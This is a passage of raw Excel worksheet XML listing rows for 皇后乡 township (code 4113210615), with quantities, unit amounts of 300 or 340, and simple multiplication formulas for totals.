        <v>2</v>
      </c>
      <c r="H1848" s="14">
        <v>300</v>
      </c>
      <c r="I1848" s="14">
        <f>H1848*G1848</f>
        <v>600</v>
      </c>
      <c r="J1848" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1848" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1849" ht="23" customHeight="1" spans="1:11">
      <c r="A1849" s="13" t="s">
        <v>4943</v>
      </c>
      <c r="B1849" s="14" t="str">
        <f>B1848</f>
        <v>皇后乡</v>
      </c>
      <c r="C1849" s="14" t="str">
        <f>C1848</f>
        <v>皇后乡</v>
      </c>
      <c r="D1849" s="13" t="s">
        <v>4944</v>
      </c>
      <c r="E1849" s="13" t="s">
        <v>4945</v>
      </c>
      <c r="F1849" s="14" t="str">
        <f>F1848</f>
        <v>4113210615</v>
      </c>
      <c r="G1849" s="14"/>
      <c r="H1849" s="14"/>
      <c r="I1849" s="14"/>
      <c r="J1849" s="14"/>
      <c r="K1849" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1850" ht="23" customHeight="1" spans="1:11">
      <c r="A1850" s="13" t="s">
        <v>4946</v>
      </c>
      <c r="B1850" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1850" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1850" s="14" t="s">
        <v>4947</v>
      </c>
      <c r="E1850" s="14" t="s">
        <v>4948</v>
      </c>
      <c r="F1850" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1850" s="14">
        <v>1</v>
      </c>
      <c r="H1850" s="14">
        <v>340</v>
      </c>
      <c r="I1850" s="14">
        <f>H1850*G1850</f>
        <v>340</v>
      </c>
      <c r="J1850" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1850" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1851" ht="23" customHeight="1" spans="1:11">
      <c r="A1851" s="13" t="s">
        <v>4949</v>
      </c>
      <c r="B1851" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1851" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1851" s="14" t="s">
        <v>4950</v>
      </c>
      <c r="E1851" s="14" t="s">
        <v>4951</v>
      </c>
      <c r="F1851" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1851" s="14">
        <v>2</v>
      </c>
      <c r="H1851" s="14">
        <v>300</v>
      </c>
      <c r="I1851" s="14">
        <f>H1851*G1851</f>
        <v>600</v>
      </c>
      <c r="J1851" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1851" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1852" ht="23" customHeight="1" spans="1:11">
      <c r="A1852" s="13" t="s">
        <v>4952</v>
      </c>
      <c r="B1852" s="14" t="str">
        <f>B1851</f>
        <v>皇后乡</v>
      </c>
      <c r="C1852" s="14" t="str">
        <f>C1851</f>
        <v>皇后乡</v>
      </c>
      <c r="D1852" s="13" t="s">
        <v>4953</v>
      </c>
      <c r="E1852" s="13" t="s">
        <v>4954</v>
      </c>
      <c r="F1852" s="14" t="str">
        <f>F1851</f>
        <v>4113210615</v>
      </c>
      <c r="G1852" s="14"/>
      <c r="H1852" s="14"/>
      <c r="I1852" s="14"/>
      <c r="J1852" s="14"/>
      <c r="K1852" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1853" ht="23" customHeight="1" spans="1:11">
      <c r="A1853" s="13" t="s">
        <v>4955</v>
      </c>
      <c r="B1853" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1853" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1853" s="14" t="s">
        <v>4956</v>
      </c>
      <c r="E1853" s="14" t="s">
        <v>4930</v>
      </c>
      <c r="F1853" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1853" s="14">
        <v>2</v>
      </c>
      <c r="H1853" s="14">
        <v>300</v>
      </c>
      <c r="I1853" s="14">
        <f>H1853*G1853</f>
        <v>600</v>
      </c>
      <c r="J1853" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1853" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1854" ht="23" customHeight="1" spans="1:11">
      <c r="A1854" s="13" t="s">
        <v>4957</v>
      </c>
      <c r="B1854" s="14" t="str">
        <f>B1853</f>
        <v>皇后乡</v>
      </c>
      <c r="C1854" s="14" t="str">
        <f>C1853</f>
        <v>皇后乡</v>
      </c>
      <c r="D1854" s="13" t="s">
        <v>4958</v>
      </c>
      <c r="E1854" s="13" t="s">
        <v>4959</v>
      </c>
      <c r="F1854" s="14" t="str">
        <f>F1853</f>
        <v>4113210615</v>
      </c>
      <c r="G1854" s="14"/>
      <c r="H1854" s="14"/>
      <c r="I1854" s="14"/>
      <c r="J1854" s="14"/>
      <c r="K1854" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1855" ht="23" customHeight="1" spans="1:11">
      <c r="A1855" s="13" t="s">
        <v>4960</v>
      </c>
      <c r="B1855" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1855" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1855" s="14" t="s">
        <v>4961</v>
      </c>
      <c r="E1855" s="14" t="s">
        <v>4962</v>
      </c>
      <c r="F1855" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1855" s="14">
        <v>1</v>
      </c>
      <c r="H1855" s="14">
        <v>340</v>
      </c>
      <c r="I1855" s="14">
        <f>H1855*G1855</f>
        <v>340</v>
      </c>
      <c r="J1855" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1855" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1856" ht="23" customHeight="1" spans="1:11">
      <c r="A1856" s="13" t="s">
        <v>4963</v>
      </c>
      <c r="B1856" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1856" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1856" s="14" t="s">
        <v>4964</v>
      </c>
      <c r="E1856" s="14" t="s">
        <v>4922</v>
      </c>
      <c r="F1856" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1856" s="14">
        <v>2</v>
      </c>
      <c r="H1856" s="14">
        <v>300</v>
      </c>
      <c r="I1856" s="14">
        <f>H1856*G1856</f>
        <v>600</v>
      </c>
      <c r="J1856" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1856" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1857" ht="23" customHeight="1" spans="1:11">
      <c r="A1857" s="13" t="s">
        <v>4965</v>
      </c>
      <c r="B1857" s="14" t="str">
        <f>B1856</f>
        <v>皇后乡</v>
      </c>
      <c r="C1857" s="14" t="str">
        <f>C1856</f>
        <v>皇后乡</v>
      </c>
      <c r="D1857" s="13" t="s">
        <v>4966</v>
      </c>
      <c r="E1857" s="13" t="s">
        <v>4967</v>
      </c>
      <c r="F1857" s="14" t="str">
        <f>F1856</f>
        <v>4113210615</v>
      </c>
      <c r="G1857" s="14"/>
      <c r="H1857" s="14"/>
      <c r="I1857" s="14"/>
      <c r="J1857" s="14"/>
      <c r="K1857" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1858" ht="23" customHeight="1" spans="1:11">
      <c r="A1858" s="13" t="s">
        <v>4968</v>
      </c>
      <c r="B1858" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1858" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1858" s="14" t="s">
        <v>4969</v>
      </c>
      <c r="E1858" s="14" t="s">
        <v>4893</v>
      </c>
      <c r="F1858" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1858" s="14">
        <v>2</v>
      </c>
      <c r="H1858" s="14">
        <v>300</v>
      </c>
      <c r="I1858" s="14">
        <f>H1858*G1858</f>
        <v>600</v>
      </c>
      <c r="J1858" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1858" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1859" ht="23" customHeight="1" spans="1:11">
      <c r="A1859" s="13" t="s">
        <v>4970</v>
      </c>
      <c r="B1859" s="14" t="str">
        <f>B1858</f>
        <v>皇后乡</v>
      </c>
      <c r="C1859" s="14" t="str">
        <f>C1858</f>
        <v>皇后乡</v>
      </c>
      <c r="D1859" s="13" t="s">
        <v>4971</v>
      </c>
      <c r="E1859" s="13" t="s">
        <v>4972</v>
      </c>
      <c r="F1859" s="14" t="str">
        <f>F1858</f>
        <v>4113210615</v>
      </c>
      <c r="G1859" s="14"/>
      <c r="H1859" s="14"/>
      <c r="I1859" s="14"/>
      <c r="J1859" s="14"/>
      <c r="K1859" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1860" ht="23" customHeight="1" spans="1:11">
      <c r="A1860" s="13" t="s">
        <v>4973</v>
      </c>
      <c r="B1860" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1860" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1860" s="14" t="s">
        <v>715</v>
      </c>
      <c r="E1860" s="14" t="s">
        <v>4900</v>
      </c>
      <c r="F1860" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1860" s="14">
        <v>2</v>
      </c>
      <c r="H1860" s="14">
        <v>300</v>
      </c>
      <c r="I1860" s="14">
        <f>H1860*G1860</f>
        <v>600</v>
      </c>
      <c r="J1860" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1860" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1861" ht="23" customHeight="1" spans="1:11">
      <c r="A1861" s="13" t="s">
        <v>4974</v>
      </c>
      <c r="B1861" s="14" t="str">
        <f>B1860</f>
        <v>皇后乡</v>
      </c>
      <c r="C1861" s="14" t="str">
        <f>C1860</f>
        <v>皇后乡</v>
      </c>
      <c r="D1861" s="13" t="s">
        <v>4975</v>
      </c>
      <c r="E1861" s="13" t="s">
        <v>4976</v>
      </c>
      <c r="F1861" s="14" t="str">
        <f>F1860</f>
        <v>4113210615</v>
      </c>
      <c r="G1861" s="14"/>
      <c r="H1861" s="14"/>
      <c r="I1861" s="14"/>
      <c r="J1861" s="14"/>
      <c r="K1861" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1862" ht="23" customHeight="1" spans="1:11">
      <c r="A1862" s="13" t="s">
        <v>4977</v>
      </c>
      <c r="B1862" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1862" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1862" s="14" t="s">
        <v>4978</v>
      </c>
      <c r="E1862" s="14" t="s">
        <v>2243</v>
      </c>
      <c r="F1862" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1862" s="14">
        <v>1</v>
      </c>
      <c r="H1862" s="14">
        <v>340</v>
      </c>
      <c r="I1862" s="14">
        <f>H1862*G1862</f>
        <v>340</v>
      </c>
      <c r="J1862" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1862" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1863" ht="23" customHeight="1" spans="1:11">
      <c r="A1863" s="13" t="s">
        <v>4979</v>
      </c>
      <c r="B1863" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1863" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1863" s="14" t="s">
        <v>4980</v>
      </c>
      <c r="E1863" s="14" t="s">
        <v>4981</v>
      </c>
      <c r="F1863" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1863" s="14">
        <v>1</v>
      </c>
      <c r="H1863" s="14">
        <v>340</v>
      </c>
      <c r="I1863" s="14">
        <f>H1863*G1863</f>
        <v>340</v>
      </c>
      <c r="J1863" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1863" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1864" ht="23" customHeight="1" spans="1:11">
      <c r="A1864" s="13" t="s">
        <v>4982</v>
      </c>
      <c r="B1864" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1864" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1864" s="14" t="s">
        <v>4983</v>
      </c>
      <c r="E1864" s="14" t="s">
        <v>4984</v>
      </c>
      <c r="F1864" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1864" s="14">
        <v>2</v>
      </c>
      <c r="H1864" s="14">
        <v>300</v>
      </c>
      <c r="I1864" s="14">
        <f>H1864*G1864</f>
        <v>600</v>
      </c>
      <c r="J1864" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1864" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1865" ht="23" customHeight="1" spans="1:11">
      <c r="A1865" s="13" t="s">
        <v>4985</v>
      </c>
      <c r="B1865" s="14" t="str">
        <f>B1864</f>
        <v>皇后乡</v>
      </c>
      <c r="C1865" s="14" t="str">
        <f>C1864</f>
        <v>皇后乡</v>
      </c>
      <c r="D1865" s="13" t="s">
        <v>4986</v>
      </c>
      <c r="E1865" s="68" t="s">
        <v>4927</v>
      </c>
      <c r="F1865" s="14" t="str">
        <f>F1864</f>
        <v>4113210615</v>
      </c>
      <c r="G1865" s="14"/>
      <c r="H1865" s="14"/>
      <c r="I1865" s="14"/>
      <c r="J1865" s="14"/>
      <c r="K1865" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1866" ht="23" customHeight="1" spans="1:11">
      <c r="A1866" s="13" t="s">
        <v>4987</v>
      </c>
      <c r="B1866" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1866" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1866" s="14" t="s">
        <v>4988</v>
      </c>
      <c r="E1866" s="14" t="s">
        <v>4989</v>
      </c>
      <c r="F1866" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1866" s="14">
        <v>2</v>
      </c>
      <c r="H1866" s="14">
        <v>300</v>
      </c>
      <c r="I1866" s="14">
        <f>H1866*G1866</f>
        <v>600</v>
      </c>
      <c r="J1866" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1866" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1867" ht="23" customHeight="1" spans="1:11">
      <c r="A1867" s="13" t="s">
        <v>4990</v>
      </c>
      <c r="B1867" s="14" t="str">
        <f>B1866</f>
        <v>皇后乡</v>
      </c>
      <c r="C1867" s="14" t="str">
        <f>C1866</f>
        <v>皇后乡</v>
      </c>
      <c r="D1867" s="13" t="s">
        <v>4991</v>
      </c>
      <c r="E1867" s="13" t="s">
        <v>4992</v>
      </c>
      <c r="F1867" s="14" t="str">
        <f>F1866</f>
        <v>4113210615</v>
      </c>
      <c r="G1867" s="14"/>
      <c r="H1867" s="14"/>
      <c r="I1867" s="14"/>
      <c r="J1867" s="14"/>
      <c r="K1867" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1868" ht="23" customHeight="1" spans="1:11">
      <c r="A1868" s="13" t="s">
        <v>4993</v>
      </c>
      <c r="B1868" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1868" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1868" s="14" t="s">
        <v>4994</v>
      </c>
      <c r="E1868" s="14" t="s">
        <v>4995</v>
      </c>
      <c r="F1868" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1868" s="14">
        <v>2</v>
      </c>
      <c r="H1868" s="14">
        <v>300</v>
      </c>
      <c r="I1868" s="14">
        <f>H1868*G1868</f>
        <v>600</v>
      </c>
      <c r="J1868" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1868" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1869" ht="23" customHeight="1" spans="1:11">
      <c r="A1869" s="13" t="s">
        <v>4996</v>
      </c>
      <c r="B1869" s="14" t="str">
        <f>B1868</f>
        <v>皇后乡</v>
      </c>
      <c r="C1869" s="14" t="str">
        <f>C1868</f>
        <v>皇后乡</v>
      </c>
      <c r="D1869" s="13" t="s">
        <v>4997</v>
      </c>
      <c r="E1869" s="13" t="s">
        <v>4998</v>
      </c>
      <c r="F1869" s="14" t="str">
        <f>F1868</f>
        <v>4113210615</v>
      </c>
      <c r="G1869" s="14"/>
      <c r="H1869" s="14"/>
      <c r="I1869" s="14"/>
      <c r="J1869" s="14"/>
      <c r="K1869" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1870" ht="23" customHeight="1" spans="1:11">
      <c r="A1870" s="13" t="s">
        <v>4999</v>
      </c>
      <c r="B1870" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1870" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1870" s="14" t="s">
        <v>5000</v>
      </c>
      <c r="E1870" s="14" t="s">
        <v>5001</v>
      </c>
      <c r="F1870" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1870" s="14">
        <v>2</v>
      </c>
      <c r="H1870" s="14">
        <v>300</v>
      </c>
      <c r="I1870" s="14">
        <f>H1870*G1870</f>
        <v>600</v>
      </c>
      <c r="J1870" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1870" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1871" ht="23" customHeight="1" spans="1:11">
      <c r="A1871" s="13" t="s">
        <v>5002</v>
      </c>
      <c r="B1871" s="14" t="str">
        <f>B1870</f>
        <v>皇后乡</v>
      </c>
      <c r="C1871" s="14" t="str">
        <f>C1870</f>
        <v>皇后乡</v>
      </c>
      <c r="D1871" s="13" t="s">
        <v>5003</v>
      </c>
      <c r="E1871" s="13" t="s">
        <v>5004</v>
      </c>
      <c r="F1871" s="14" t="str">
        <f>F1870</f>
        <v>4113210615</v>
      </c>
      <c r="G1871" s="14"/>
      <c r="H1871" s="14"/>
      <c r="I1871" s="14"/>
      <c r="J1871" s="14"/>
      <c r="K1871" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1872" ht="23" customHeight="1" spans="1:11">
      <c r="A1872" s="13" t="s">
        <v>5005</v>
      </c>
      <c r="B1872" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1872" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1872" s="14" t="s">
        <v>5006</v>
      </c>
      <c r="E1872" s="14" t="s">
        <v>4911</v>
      </c>
      <c r="F1872" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1872" s="14">
        <v>1</v>
      </c>
      <c r="H1872" s="14">
        <v>340</v>
      </c>
      <c r="I1872" s="14">
        <f>H1872*G1872</f>
        <v>340</v>
      </c>
      <c r="J1872" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1872" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1873" ht="23" customHeight="1" spans="1:11">
      <c r="A1873" s="13" t="s">
        <v>5007</v>
      </c>
      <c r="B1873" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1873" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1873" s="14" t="s">
        <v>5008</v>
      </c>
      <c r="E1873" s="14" t="s">
        <v>5009</v>
      </c>
      <c r="F1873" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1873" s="14">
        <v>1</v>
      </c>
      <c r="H1873" s="14">
        <v>340</v>
      </c>
      <c r="I1873" s="14">
        <f>H1873*G1873</f>
        <v>340</v>
      </c>
      <c r="J1873" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1873" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1874" ht="23" customHeight="1" spans="1:11">
      <c r="A1874" s="13" t="s">
        <v>5010</v>
      </c>
      <c r="B1874" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1874" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1874" s="14" t="s">
        <v>5011</v>
      </c>
      <c r="E1874" s="14" t="s">
        <v>5012</v>
      </c>
      <c r="F1874" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1874" s="14">
        <v>1</v>
      </c>
      <c r="H1874" s="14">
        <v>340</v>
      </c>
      <c r="I1874" s="14">
        <f>H1874*G1874</f>
        <v>340</v>
      </c>
      <c r="J1874" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1874" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1875" ht="23" customHeight="1" spans="1:11">
      <c r="A1875" s="13" t="s">
        <v>5013</v>
      </c>
      <c r="B1875" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1875" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1875" s="14" t="s">
        <v>5014</v>
      </c>
      <c r="E1875" s="14" t="s">
        <v>5015</v>
      </c>
      <c r="F1875" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1875" s="14">
        <v>1</v>
      </c>
      <c r="H1875" s="14">
        <v>340</v>
      </c>
      <c r="I1875" s="14">
        <f>H1875*G1875</f>
        <v>340</v>
      </c>
      <c r="J1875" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1875" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1876" ht="23" customHeight="1" spans="1:11">
      <c r="A1876" s="13" t="s">
        <v>5016</v>
      </c>
      <c r="B1876" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1876" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1876" s="14" t="s">
        <v>5017</v>
      </c>
      <c r="E1876" s="14" t="s">
        <v>4900</v>
      </c>
      <c r="F1876" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1876" s="14">
        <v>2</v>
      </c>
      <c r="H1876" s="14">
        <v>300</v>
      </c>
      <c r="I1876" s="14">
        <f>H1876*G1876</f>
        <v>600</v>
      </c>
      <c r="J1876" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1876" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1877" ht="23" customHeight="1" spans="1:11">
      <c r="A1877" s="13" t="s">
        <v>5018</v>
      </c>
      <c r="B1877" s="14" t="str">
        <f>B1876</f>
        <v>皇后乡</v>
      </c>
      <c r="C1877" s="14" t="str">
        <f>C1876</f>
        <v>皇后乡</v>
      </c>
      <c r="D1877" s="13" t="s">
        <v>3927</v>
      </c>
      <c r="E1877" s="13" t="s">
        <v>5019</v>
      </c>
      <c r="F1877" s="14" t="str">
        <f>F1876</f>
        <v>4113210615</v>
      </c>
      <c r="G1877" s="14"/>
      <c r="H1877" s="14"/>
      <c r="I1877" s="14"/>
      <c r="J1877" s="14"/>
      <c r="K1877" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1878" ht="23" customHeight="1" spans="1:11">
      <c r="A1878" s="13" t="s">
        <v>5020</v>
      </c>
      <c r="B1878" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1878" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1878" s="14" t="s">
        <v>5021</v>
      </c>
      <c r="E1878" s="14" t="s">
        <v>5022</v>
      </c>
      <c r="F1878" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1878" s="14">
        <v>2</v>
      </c>
      <c r="H1878" s="14">
        <v>300</v>
      </c>
      <c r="I1878" s="14">
        <f>H1878*G1878</f>
        <v>600</v>
      </c>
      <c r="J1878" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1878" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1879" ht="23" customHeight="1" spans="1:11">
      <c r="A1879" s="13" t="s">
        <v>5023</v>
      </c>
      <c r="B1879" s="14" t="str">
        <f>B1878</f>
        <v>皇后乡</v>
      </c>
      <c r="C1879" s="14" t="str">
        <f>C1878</f>
        <v>皇后乡</v>
      </c>
      <c r="D1879" s="13" t="s">
        <v>5024</v>
      </c>
      <c r="E1879" s="13" t="s">
        <v>5025</v>
      </c>
      <c r="F1879" s="14" t="str">
        <f>F1878</f>
        <v>4113210615</v>
      </c>
      <c r="G1879" s="14"/>
      <c r="H1879" s="14"/>
      <c r="I1879" s="14"/>
      <c r="J1879" s="14"/>
      <c r="K1879" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1880" ht="23" customHeight="1" spans="1:11">
      <c r="A1880" s="13" t="s">
        <v>5026</v>
      </c>
      <c r="B1880" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1880" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1880" s="14" t="s">
        <v>5027</v>
      </c>
      <c r="E1880" s="14" t="s">
        <v>5028</v>
      </c>
      <c r="F1880" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1880" s="14">
        <v>2</v>
      </c>
      <c r="H1880" s="14">
        <v>300</v>
      </c>
      <c r="I1880" s="14">
        <f>H1880*G1880</f>
        <v>600</v>
      </c>
      <c r="J1880" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1880" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1881" ht="23" customHeight="1" spans="1:11">
      <c r="A1881" s="13" t="s">
        <v>5029</v>
      </c>
      <c r="B1881" s="14" t="str">
        <f>B1880</f>
        <v>皇后乡</v>
      </c>
      <c r="C1881" s="14" t="str">
        <f>C1880</f>
        <v>皇后乡</v>
      </c>
      <c r="D1881" s="13" t="s">
        <v>5030</v>
      </c>
      <c r="E1881" s="13" t="s">
        <v>5031</v>
      </c>
      <c r="F1881" s="14" t="str">
        <f>F1880</f>
        <v>4113210615</v>
      </c>
      <c r="G1881" s="14"/>
      <c r="H1881" s="14"/>
      <c r="I1881" s="14"/>
      <c r="J1881" s="14"/>
      <c r="K1881" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1882" ht="23" customHeight="1" spans="1:11">
      <c r="A1882" s="13" t="s">
        <v>5032</v>
      </c>
      <c r="B1882" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1882" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1882" s="14" t="s">
        <v>5033</v>
      </c>
      <c r="E1882" s="14" t="s">
        <v>5034</v>
      </c>
      <c r="F1882" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1882" s="14">
        <v>1</v>
      </c>
      <c r="H1882" s="14">
        <v>340</v>
      </c>
      <c r="I1882" s="14">
        <f>H1882*G1882</f>
        <v>340</v>
      </c>
      <c r="J1882" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1882" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1883" ht="23" customHeight="1" spans="1:11">
      <c r="A1883" s="13" t="s">
        <v>5035</v>
      </c>
      <c r="B1883" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1883" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1883" s="14" t="s">
        <v>5036</v>
      </c>
      <c r="E1883" s="14" t="s">
        <v>5037</v>
      </c>
      <c r="F1883" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1883" s="14">
        <v>2</v>
      </c>
      <c r="H1883" s="14">
        <v>300</v>
      </c>
      <c r="I1883" s="14">
        <f>H1883*G1883</f>
        <v>600</v>
      </c>
      <c r="J1883" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1883" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1884" ht="23" customHeight="1" spans="1:11">
      <c r="A1884" s="13" t="s">
        <v>5038</v>
      </c>
      <c r="B1884" s="14" t="str">
        <f>B1883</f>
        <v>皇后乡</v>
      </c>
      <c r="C1884" s="14" t="str">
        <f>C1883</f>
        <v>皇后乡</v>
      </c>
      <c r="D1884" s="13" t="s">
        <v>5039</v>
      </c>
      <c r="E1884" s="13" t="s">
        <v>4945</v>
      </c>
      <c r="F1884" s="14" t="str">
        <f>F1883</f>
        <v>4113210615</v>
      </c>
      <c r="G1884" s="14"/>
      <c r="H1884" s="14"/>
      <c r="I1884" s="14"/>
      <c r="J1884" s="14"/>
      <c r="K1884" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1885" ht="23" customHeight="1" spans="1:11">
      <c r="A1885" s="13" t="s">
        <v>5040</v>
      </c>
      <c r="B1885" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1885" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1885" s="14" t="s">
        <v>5041</v>
      </c>
      <c r="E1885" s="14" t="s">
        <v>5022</v>
      </c>
      <c r="F1885" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1885" s="14">
        <v>2</v>
      </c>
      <c r="H1885" s="14">
        <v>300</v>
      </c>
      <c r="I1885" s="14">
        <f>H1885*G1885</f>
        <v>600</v>
      </c>
      <c r="J1885" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1885" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1886" ht="23" customHeight="1" spans="1:11">
      <c r="A1886" s="13" t="s">
        <v>5042</v>
      </c>
      <c r="B1886" s="14" t="str">
        <f>B1885</f>
        <v>皇后乡</v>
      </c>
      <c r="C1886" s="14" t="str">
        <f>C1885</f>
        <v>皇后乡</v>
      </c>
      <c r="D1886" s="13" t="s">
        <v>5043</v>
      </c>
      <c r="E1886" s="13" t="s">
        <v>5044</v>
      </c>
      <c r="F1886" s="14" t="str">
        <f>F1885</f>
        <v>4113210615</v>
      </c>
      <c r="G1886" s="14"/>
      <c r="H1886" s="14"/>
      <c r="I1886" s="14"/>
      <c r="J1886" s="14"/>
      <c r="K1886" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1887" ht="23" customHeight="1" spans="1:11">
      <c r="A1887" s="13" t="s">
        <v>5045</v>
      </c>
      <c r="B1887" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="C1887" s="14" t="s">
        <v>4891</v>
      </c>
      <c r="D1887" s="14" t="s">
        <v>5046</v>
      </c>
      <c r="E1887" s="14" t="s">
        <v>5012</v>
      </c>
      <c r="F1887" s="14" t="s">
        <v>4894</v>
      </c>
      <c r="G1887" s="14">
        <v>2</v>
      </c>
